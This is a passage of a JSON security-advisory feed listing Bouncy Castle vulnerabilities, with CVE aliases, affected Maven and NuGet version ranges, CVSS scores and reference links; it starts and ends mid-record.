"http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/79091" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037036" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037046" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1037053" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:37Z", "nvd_published_at": "2015-11-09T16:59:09Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-4vhj-98r6-424h", "published": "2018-10-17T16:23:26Z", "modified": "2025-09-12T20:11:46.340387Z", "aliases": [ "CVE-2016-1000338" ], "summary": "In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate", "details": "In Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.38" }, { "fixed": "1.56" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4vhj-98r6-424h/GHSA-4vhj-98r6-424h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000338" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/b0c3ce99d43d73a096268831d0d120ffc89eac7f#diff-3679f5a9d2b939d0d3ee1601a7774fb0" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231006-0011" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3727-1" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ], "database_specific": { "cwe_ids": [ "CWE-347" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:59:18Z", "nvd_published_at": "2018-06-01T20:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6xx3-rg99-gc3p", "published": "2021-08-13T15:22:31Z", "modified": "2025-07-17T22:23:36.388813Z", "aliases": [ "CVE-2020-15522" ], "related": [ "CGA-3544-c7xc-jx43", "CGA-p736-f9r6-77r7" ], "summary": "Timing based private key exposure in Bouncy Castle", "details": "Bouncy Castle BC Java before 1.66, BC C# .NET before 1.8.7, BC-FJA before 1.0.2.1, BC before 1.66, BC-FNA before 1.0.1.1 have a timing issue within the EC math library that can expose information about the private key when an attacker is able to observe timing information for the generation of multiple deterministic ECDSA signatures.", "affected": [ { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2.1" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60", "1.61", "1.62", "1.63", "1.64", "1.65", "1.65.01" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.63", "1.64", "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.66" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } }, { "package": { "name": "BouncyCastle", "ecosystem": "NuGet", "purl": "pkg:nuget/BouncyCastle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.7" } ] } ], "versions": [ "1.7.0", "1.8.1", "1.8.2", "1.8.3", "1.8.3.1", "1.8.4", "1.8.5", "1.8.6", "1.8.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-6xx3-rg99-gc3p/GHSA-6xx3-rg99-gc3p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15522" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-csharp/wiki/CVE-2020-15522" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-15522" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210622-0007" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" } ], "database_specific": { "cwe_ids": [ "CWE-203", "CWE-362" ], "github_reviewed": true, "github_reviewed_at": "2021-05-21T17:50:36Z", "nvd_published_at": "2021-05-20T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-72m5-fvvv-55m6", "published": "2021-04-22T16:16:49Z", "modified": "2025-07-17T22:22:44.756584Z", "aliases": [ "CVE-2020-26939" ], "summary": "Observable Differences in Behavior to Error Inputs in Bouncy Castle", "details": "In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bc-fips", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bc-fips" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.2" } ] } ], "versions": [ "1.0.0", "1.0.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59", "1.60" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.61" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-72m5-fvvv-55m6/GHSA-72m5-fvvv-55m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26939" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-26939" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e%40%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201202-0005" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2021-04-20T16:59:30Z", "nvd_published_at": "2020-11-02T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-73xv-w5gp-frxh", "published": "2021-04-30T16:14:15Z", "modified": "2024-03-08T05:18:41.838529Z", "aliases": [ "CVE-2020-28052" ], "summary": "Logic error in Legion of the Bouncy Castle BC Java", "details": "An issue was discovered in Legion of the Bouncy Castle BC Java 1.65 and 1.66. The OpenBSDBCrypt.checkPassword utility method compared incorrect data when checking the password, allowing incorrect passwords to indicate they were matching with previously hashed ones that were different.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15to18", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15to18" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.65.01", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65", "1.66" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "versions": [ "1.65" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } }, { "package": { "name": "org.bouncycastle:bcprov-ext-jdk16", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-ext-jdk16" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.65" }, { "fixed": "1.67" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-73xv-w5gp-frxh/GHSA-73xv-w5gp-frxh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28052" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/97578f9b7ed277e6ecb58834e85e3d18385a4219" }, { "type": "WEB", "url": "https://www.synopsys.com/blogs/software-security/cve-2020-28052-bouncy-castle" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc0db1f3c375087e69a239f9284ded72d04fbb55849eadde58fa9dc2@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9abfc0223747a56694825c050cc6b66627a293a32ea926b3de22402@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdfd2901b8b697a3f6e2c9c6ecc688fd90d7f881937affb5144d61d6e@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rddd2237b8636a48d573869006ee809262525efb2b6ffa6eff50d2a2d@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdcbad6d8ce72c79827ed8c635f9a62dd919bb21c94a0b64cab2efc31@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd37d9214b08067a2e8f2b5b4fd123a1f8cb6008698d11ef44028c21@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc9e441c1576bdc4375d32526d5cf457226928e9c87b9f54ded26271c@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r954d80fd18e9dafef6e813963eb7e08c228151c2b6268ecd63b35d1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r77af3ac7c3bfbd5454546e13faf7aec21d627bdcf36c9ca240436b94@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4e1619cfefcd031fac62064a3858f5c9229eef907bd5d8ef14c594fc@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37d332c0bf772f4982d1fdeeb2f88dd71dab6451213e69e43734eadc@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r30a139c165b3da6e0d5536434ab1550534011b1fdfcd2f5d95892c5b@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ddabd06d94b60cfb0141e4abb23201c628ab925e30742f61a04d013@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25d53acd06f29244b8a103781b0339c5e7efee9099a4d52f0c230e4a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r175f5a25d100dbe2b1bd3459b3ce882a84c3ff91b120ed4ff2d57b53@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r167dbc42ef7c59802c2ca1ac14735ef9cf687c25208229993d6206fe@%3Cissues.karaf.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2020-28052" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" } ], "database_specific": { "cwe_ids": [ "CWE-670" ], "github_reviewed": true, "github_reviewed_at": "2021-03-19T00:15:55Z", "nvd_published_at": "2020-12-18T01:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8353-fgcr-xfhx", "published": "2022-05-14T02:14:04Z", "modified": "2024-12-05T05:42:02.521197Z", "aliases": [ "CVE-2013-1624" ], "summary": "Improper Input Validation in Bouncy Castle", "details": "The TLS implementation in the Bouncy Castle Java library before 1.48 and C# library before 1.8 does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.48" } ] } ], "versions": [ "1.46", "1.47" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8353-fgcr-xfhx/GHSA-8353-fgcr-xfhx.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1624" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2013/02/05/24" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0371.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0372.html" }, { "type": "WEB", "url": "http://secunia.com/advisories/57716" }, { "type": "WEB", "url": "http://secunia.com/advisories/57719" }, { "type": "WEB", "url": "http://www.isg.rhul.ac.uk/tls/TLStiming.pdf" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-07-08T18:59:52Z", "nvd_published_at": "2013-02-08T19:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-8477-3v39-ggpm", "published": "2022-05-13T01:01:01Z", "modified": "2023-11-08T04:00:20.719699Z", "aliases": [ "CVE-2018-5382" ], "summary": "Improper Validation of Integrity Check Value in Bouncy Castle", "details": "The default BKS keystore use an HMAC that is only 16 bits long, which can allow an attacker to compromise the integrity of a BKS keystore. Bouncy Castle release 1.47 changes the BKS format to a format which uses a 160 bit HMAC instead. This applies to any BKS keystore generated prior to BC 1.47. For situations where people need to create the files for legacy reasons a specific keystore type \"BKS-V1\" was introduced in 1.49. It should be noted that the use of \"BKS-V1\" is discouraged by the library authors and should only be used where it is otherwise safe to do so, as in where the use of a 16 bit checksum for the file integrity check is not going to cause a security issue in itself.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.50" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8477-3v39-ggpm/GHSA-8477-3v39-ggpm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5382" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2927" }, { "type": "WEB", "url": "https://www.bouncycastle.org/releasenotes.html" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/306792" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/103453" } ], "database_specific": { "cwe_ids": [ "CWE-354" ], "github_reviewed": true, "github_reviewed_at": "2022-06-28T23:51:50Z", "nvd_published_at": "2018-04-16T14:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8xfc-gm6g-vgpv", "published": "2024-05-14T15:32:54Z", "modified": "2024-12-06T15:48:32.838321Z", "aliases": [ "CGA-h49m-7vwx-446f", "CGA-pmw5-3929-3rqr", "CGA-x9cj-c42r-f4mr", "CVE-2024-29857" ], "related": [ "CGA-29h3-969m-j2cr", "CGA-448v-pf2r-j83m", "CGA-4cgj-59hq-h2hc", "CGA-4ph3-8p4p-wr86", "CGA-5hp5-r4pg-f3p7", "CGA-7p4p-m9qg-mv7r", "CGA-89h2-vv89-63r8", "CGA-cw5g-gfw6-xx43", "CGA-f25f-36f8-w45w", "CGA-f92w-p726-49xr", "CGA-g9h5-gx89-c9v8", "CGA-p93x-49fc-v5m3", "CGA-pfv3-x3hq-59qp", "CGA-vmgg-m99c-vcmm", "CGA-xx3m-cg2g-f46r" ], "summary": "Bouncy Castle certificate parsing issues cause high CPU usage during parameter evaluation.", "details": "An issue was discovered in ECCurve.java and ECCurve.cs in Bouncy Castle Java (BC Java) before 1.78, BC Java 